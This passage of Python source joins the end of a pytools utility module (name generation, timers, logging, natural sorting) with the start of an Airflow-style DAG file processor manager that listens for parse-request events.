.. automethod:: add_name
.. automethod:: add_names
.. automethod:: __call__
"""
def __init__(self,
existing_names: Optional[Set[str]] = None,
forced_prefix: str = ""):
if existing_names is None:
existing_names = set()
self.existing_names = existing_names.copy()
self.forced_prefix = forced_prefix
self.prefix_to_counter: Dict[str, int] = {}
def is_name_conflicting(self, name: str) -> bool:
return name in self.existing_names
def _name_added(self, name: str) -> None:
"""Callback to alert subclasses when a name has been added.
.. note::
This will not get called for the names in the *existing_names*
argument to :meth:`__init__`.
"""
pass
def add_name(self, name: str) -> None:
if self.is_name_conflicting(name):
raise ValueError("name '%s' conflicts with existing names")
if not name.startswith(self.forced_prefix):
raise ValueError("name '%s' does not start with required prefix")
self.existing_names.add(name)
self._name_added(name)
def add_names(self, names: Iterable[str]) -> None:
for name in names:
self.add_name(name)
def __call__(self, based_on: str = "id") -> str:
based_on = self.forced_prefix + based_on
counter = self.prefix_to_counter.get(based_on, None)
for counter, var_name in generate_numbered_unique_names(based_on, counter):
if not self.is_name_conflicting(var_name):
break
self.prefix_to_counter[based_on] = counter
var_name = intern(var_name) # pylint: disable=undefined-loop-variable
self.existing_names.add(var_name)
self._name_added(var_name)
return var_name
# }}}
# {{{ recursion limit
class MinRecursionLimit:
def __init__(self, min_rec_limit):
self.min_rec_limit = min_rec_limit
def __enter__(self):
# pylint: disable=attribute-defined-outside-init
self.prev_recursion_limit = sys.getrecursionlimit()
new_limit = max(self.prev_recursion_limit, self.min_rec_limit)
sys.setrecursionlimit(new_limit)
def __exit__(self, exc_type, exc_val, exc_tb):
# Deep recursion can produce deeply nested data structures
# (or long chains of to-be gc'd generators) that cannot be
# undergo garbage collection with a lower recursion limit.
#
# As a result, it doesn't seem possible to lower the recursion limit
# again after it has been raised without causing reliability issues.
#
# See https://gitlab.tiker.net/inducer/sumpy/issues/31 for
# context.
pass
# }}}
# {{{ download from web if not present
def download_from_web_if_not_present(url, local_name=None):
"""
.. versionadded:: 2017.5
"""
from os.path import basename, exists
if local_name is None:
local_name = basename(url)
if not exists(local_name):
from pytools.version import VERSION_TEXT
from urllib.request import Request, urlopen
req = Request(url, headers={
"User-Agent": f"pytools/{VERSION_TEXT}"
})
with urlopen(req) as inf:
contents = inf.read()
with open(local_name, "wb") as outf:
outf.write(contents)
# }}}
# {{{ find git revisions
def find_git_revision(tree_root): # pylint: disable=too-many-locals
# Keep this routine self-contained so that it can be copy-pasted into
# setup.py.
from os.path import join, exists, abspath
tree_root = abspath(tree_root)
if not exists(join(tree_root, ".git")):
return None
# construct minimal environment
# stolen from
# https://github.com/numpy/numpy/blob/055ce3e90b50b5f9ef8cf1b8641c42e391f10735/setup.py#L70-L92
import os
env = {}
for k in ["SYSTEMROOT", "PATH", "HOME"]:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env["LANGUAGE"] = "C"
env["LANG"] = "C"
env["LC_ALL"] = "C"
from subprocess import Popen, PIPE, STDOUT
p = Popen(["git", "rev-parse", "HEAD"], shell=False,
stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True,
cwd=tree_root, env=env)
(git_rev, _) = p.communicate()
git_rev = git_rev.decode()
git_rev = git_rev.rstrip()
retcode = p.returncode
assert retcode is not None
if retcode != 0:
from warnings import warn
warn("unable to find git revision")
return None
return git_rev
def find_module_git_revision(module_file, n_levels_up):
from os.path import dirname, join
tree_root = join(*([dirname(module_file)] + [".." * n_levels_up]))
return find_git_revision(tree_root)
# }}}
# {{{ create a reshaped view of a numpy array
def reshaped_view(a, newshape):
""" Create a new view object with shape ``newshape`` without copying the data of
``a``. This function is different from ``numpy.reshape`` by raising an
exception when data copy is necessary.
:arg a: a :class:`numpy.ndarray` object.
:arg newshape: an ``int`` object or a tuple of ``int`` objects.
.. versionadded:: 2018.4
"""
newview = a.view()
newview.shape = newshape
return newview
# }}}
# {{{ process timer
SUPPORTS_PROCESS_TIME = (sys.version_info >= (3, 3))
class ProcessTimer:
"""Measures elapsed wall time and process time.
.. automethod:: __enter__
.. automethod:: __exit__
.. automethod:: done
Timing data attributes:
.. attribute:: wall_elapsed
.. attribute:: process_elapsed
Only available in Python 3.3+.
.. versionadded:: 2018.5
"""
def __init__(self):
import time
if SUPPORTS_PROCESS_TIME:
self.perf_counter_start = time.perf_counter()
self.process_time_start = time.process_time()
else:
import timeit
self.time_start = timeit.default_timer()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def done(self):
# pylint: disable=attribute-defined-outside-init
import time
if SUPPORTS_PROCESS_TIME:
self.wall_elapsed = time.perf_counter() - self.perf_counter_start
self.process_elapsed = time.process_time() - self.process_time_start
else:
import timeit
self.wall_elapsed = timeit.default_timer() - self.time_start
self.process_elapsed = None
# }}}
# {{{ log utilities
class ProcessLogger: # pylint: disable=too-many-instance-attributes
"""Logs the completion time of a (presumably) lengthy process to :mod:`logging`.
Only uses a high log level if the process took perceptible time.
.. automethod:: __init__
.. automethod:: done
.. automethod:: __enter__
.. automethod:: __exit__
"""
default_noisy_level = logging.INFO
def __init__( # pylint: disable=too-many-arguments
self, logger, description,
silent_level=None, noisy_level=None, long_threshold_seconds=None):
self.logger = logger
self.description = description
self.silent_level = silent_level or logging.DEBUG
self.noisy_level = noisy_level or self.default_noisy_level
self.long_threshold_seconds = (
# 0 is a valid value that should override the default
0.3 if long_threshold_seconds is None else long_threshold_seconds)
self.logger.log(self.silent_level, "%s: start", self.description)
self.is_done = False
import threading
self.late_start_log_thread = threading.Thread(target=self._log_start_if_long)
# Do not delay interpreter exit if thread not finished.
self.late_start_log_thread.daemon = True
# https://github.com/firedrakeproject/firedrake/issues/1422
# Starting a thread may irrecoverably break various environments,
# e.g. MPI.
#
# Since the late-start logging is an optional 'quality-of-life'
# feature for interactive use, do not do it unless there is (weak)
# evidence of interactive use.
import sys
if sys.stdin is None:
# Can happen, e.g., if pudb is controlling the console.
use_late_start_logging = False
else:
use_late_start_logging = sys.stdin.isatty()
import os
if os.environ.get("PYTOOLS_LOG_NO_THREADS", ""):
use_late_start_logging = False
if use_late_start_logging:
try:
self.late_start_log_thread.start()
except RuntimeError:
# https://github.com/firedrakeproject/firedrake/issues/1422
#
# Starting a thread may fail in various environments, e.g. MPI.
# Since the late-start logging is an optional 'quality-of-life'
# feature for interactive use, tolerate failures of it without
# warning.
pass
self.timer = ProcessTimer()
def _log_start_if_long(self):
from time import sleep
sleep_duration = 10*self.long_threshold_seconds
sleep(sleep_duration)
if not self.is_done:
self.logger.log(
self.noisy_level, "%s: started %.gs ago",
self.description,
sleep_duration)
def done( # pylint: disable=keyword-arg-before-vararg
self, extra_msg=None, *extra_fmt_args):
self.timer.done()
self.is_done = True
wall_elapsed = self.timer.wall_elapsed
process_elapsed = self.timer.process_elapsed
completion_level = (
self.noisy_level
if wall_elapsed > self.long_threshold_seconds
else self.silent_level)
if process_elapsed is not None:
msg = "%s: completed (%.2fs wall, %.1fx CPU)"
fmt_args = [self.description, wall_elapsed, process_elapsed/wall_elapsed]
else:
msg = "%s: completed (%f.2s wall)"
fmt_args = [self.description, wall_elapsed]
if extra_msg:
msg += ": " + extra_msg
fmt_args.extend(extra_fmt_args)
self.logger.log(completion_level, msg, *fmt_args)
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
class DebugProcessLogger(ProcessLogger):
default_noisy_level = logging.DEBUG
class log_process: # noqa: N801
"""A decorator that uses :class:`ProcessLogger` to log data about calls
to the wrapped function.
"""
def __init__(self, logger, description=None):
self.logger = logger
self.description = description
def __call__(self, wrapped):
def wrapper(*args, **kwargs):
with ProcessLogger(
self.logger,
self.description or wrapped.__name__):
return wrapped(*args, **kwargs)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, wrapped)
return new_wrapper
# }}}
# {{{ sorting in natural order
def natorder(item):
"""Return a key for natural order string comparison.
See :func:`natsorted`.
.. versionadded:: 2020.1
"""
import re
result = []
for (int_val, string_val) in re.findall(r"(\d+)|(\D+)", item):
if int_val:
result.append(int(int_val))
# Tie-breaker in case of leading zeros in *int_val*. Longer values
# compare smaller to preserve order of numbers in decimal notation,
# e.g., "1.001" < "1.01"
# (cf. https://github.com/sourcefrog/natsort)
result.append(-len(int_val))
else:
result.append(string_val)
return result
def natsorted(iterable, key=None, reverse=False):
"""Sort using natural order [1]_, as opposed to lexicographic order.
Example::
>>> sorted(["_10", "_1", "_9"]) == ["_1", "_10", "_9"]
True
>>> natsorted(["_10", "_1", "_9"]) == ["_1", "_9", "_10"]
True
:arg iterable: an iterable to be sorted. It must only have strings, unless
*key* is specified.
:arg key: if provided, a key function that returns strings for ordering
using natural order.
:arg reverse: if *True*, sorts in descending order.
:returns: a sorted list
.. [1] https://en.wikipedia.org/wiki/Natural_sort_order
.. versionadded:: 2020.1
"""
if key is None:
key = lambda x: x
return sorted(iterable, key=lambda y: natorder(key(y)), reverse=reverse)
# }}}
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
# vim: foldmethod=marker
|
dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import signal
import sys
import queue
import time
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, Dict, List, NamedTuple, Optional, Tuple, Union, cast
from setproctitle import setproctitle # pylint: disable=no-name-in-module
from notification_service.base_notification import EventWatcher, BaseEvent, BaseNotification
from notification_service.client import NotificationClient
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.models import DagModel, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_DAG_CODE
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, SlaCallbackRequest, TaskCallbackRequest
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import provide_session
from airflow.utils.state import State
from airflow.events.scheduler_events import SCHEDULER_NAMESPACE, SchedulerInnerEventType
class AbstractDagFileProcessorProcess(metaclass=ABCMeta):
"""Processes a DAG file. See SchedulerJob.process_file() for more details."""
@abstractmethod
def start(self) -> None:
"""Launch the process to process the file"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill: bool = False):
"""Terminate (and then kill) the process launched to process the file"""
raise NotImplementedError()
@abstractmethod
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
raise NotImplementedError()
@property
@abstractmethod
def pid(self) -> int:
""":return: the PID of the process launched to process the given file"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self) -> Optional[Tuple[int, int]]:
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file() if available. Otherwise, none
:rtype: Optional[Tuple[int, int]]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self) -> datetime:
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self) -> str:
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
@property
@abstractmethod
def waitable_handle(self):
"""A "waitable" handle that can be passed to ``multiprocessing.connection.wait()``"""
raise NotImplementedError()
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
file_paths: List[str]
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: ([str, List[CallbackRequest], Optional[List[str]], bool]) -> (
AbstractDagFileProcessorProcess
)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type: pickle_dags: bool
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[
[str, List[CallbackRequest], Optional[List[str]], bool], AbstractDagFileProcessorProcess
],
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
refresh_dag_dir_interval=0,
notification_service_uri=None
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.Process] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
self.refresh_dag_dir_interval = refresh_dag_dir_interval
self.notification_service_uri = notification_service_uri
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
# getattr prevents error while pickling an instance method.
getattr(self, "_processor_factory"),
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
self.refresh_dag_dir_interval,
self.notification_service_uri
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_callback_to_execute(self, request: CallbackRequest) -> None:
"""
Sends information about the callback to be executed by DagFileProcessor.
:param request: Callback request to be executed.
:type request: CallbackRequest
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
self._parent_signal_conn.send(request)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_sla_callback_request_to_execute(self, full_filepath: str, dag_id: str) -> None:
"""
Sends information about the SLA callback to be executed by DagFileProcessor.
:param full_filepath: DAG File path
:type full_filepath: str
:param dag_id: DAG ID
:type dag_id: str
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
request = SlaCallbackRequest(full_filepath=full_filepath, dag_id=dag_id)
self._parent_signal_conn.send(request)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
self._sync_metadata(result)
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[CallbackRequest]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
refresh_dag_dir_interval=0,
notification_service_uri=None
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
refresh_dag_dir_interval,
notification_service_uri
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
class ProcessorManagerWatcher(EventWatcher, LoggingMixin):
def __init__(self, signal_queue: queue.Queue):
super().__init__()
self.signal_queue = signal_queue
def process(self, events: List[BaseEvent]):
for e in events:
self.log.debug("Listen Event: {}".format(e))
self.signal_queue.put((e, timezone.utcnow()))
class DagFileProcessorManager(LoggingMixin): # pylint: disable=too-many-instance-attributes
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: MultiprocessingConnection
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type pickle_dags: bool
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[CallbackRequest]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
refresh_dag_dir_interval=0,
notification_service_uri=None
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
self._refresh_dag_dir_interval = refresh_dag_dir_interval
self.notification_service_uri = notification_service_uri
self.ns_client: BaseNotification = None
self.signal_queue = queue.Queue()
if notification_service_uri is not None:
self.watcher = ProcessorManagerWatcher(self.signal_queue)
self.message_buffer: Dict[str, (BaseEvent, datetime)] = {}
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d ) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# How many seconds do we wait for tasks to heartbeat before mark them as zombies.
self._zombie_threshold_secs = conf.getint('scheduler', 'scheduler_zombie_task_threshold')
# Should store dag file source in a database?
self.store_dag_code = STORE_DAG_CODE
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# TODO: Remove magic number
self._zombie_query_interval = 10
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
self.remove_non_existent_dag: bool = conf.getboolean('scheduler', 'remove_non_existent_dag', fallback=True)
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, AbstractDagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
self._listen_parse_dag_event()
return self._run_parsing_loop()
def _listen_parse_dag_event(self):
if self.notification_service_uri is not None:
self.log.info('start listen PARSE_DAG_REQUEST {}'.format(self.notification_service_uri))
self.ns_client = NotificationClient(server_uri=self.notification_service_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.ns_client.start_listen_event(key='*',
event_type='PARSE_DAG_REQUEST',
namespace='*',
watcher=self.watcher,
start_time=int(time.time() * 1000))
def _stop_listen_events(self):
if self.ns_client is not None:
self.ns_client.stop_listen_event(key=None)
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
# pylint: disable=no-else-break
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._refresh_dag_dir()
self._find_zombies() # pylint: disable=no-value-for-parameter
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(
self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
# send event to notify parse dag finished
refresh_dag_dir_interval = time.monotonic() - loop_start_time
if refresh_dag_dir_interval < self._refresh_dag_dir_interval:
wait_time = self._refresh_dag_dir_interval - refresh_dag_dir_interval
else:
wait_time = 1.0
if self.notification_service_uri is not None and len(self.message_buffer) > 0:
self._process_and_send_response()
self.collect_results()
time.sleep(wait_time)
if self.signal_queue.qsize() > 0:
self._add_file_to_queue()
def _process_and_send_response(self):
for event, process_time in self.message_buffer.copy().values():
file_path = event.value
finish_process_time = self.get_last_finish_time(file_path)
duration = self.get_last_runtime(file_path)
if not finish_process_time or not duration:
continue
start_process_time = finish_process_time - timedelta(seconds=duration)
self.log.debug('Check dag processor start_process_time {} process_time {} file_path {}'
.format(start_process_time, process_time, file_path))
if start_process_time > process_time:
self.ns_client.send_event(BaseEvent(key=event.key,
value=file_path,
event_type=SchedulerInnerEventType.PARSE_DAG_RESPONSE.value))
self.message_buffer.pop(file_path)
def _add_file_to_queue(self):
for i in range(self.signal_queue.qsize()):
message, process_time = self.signal_queue.get()
file_path = message.value
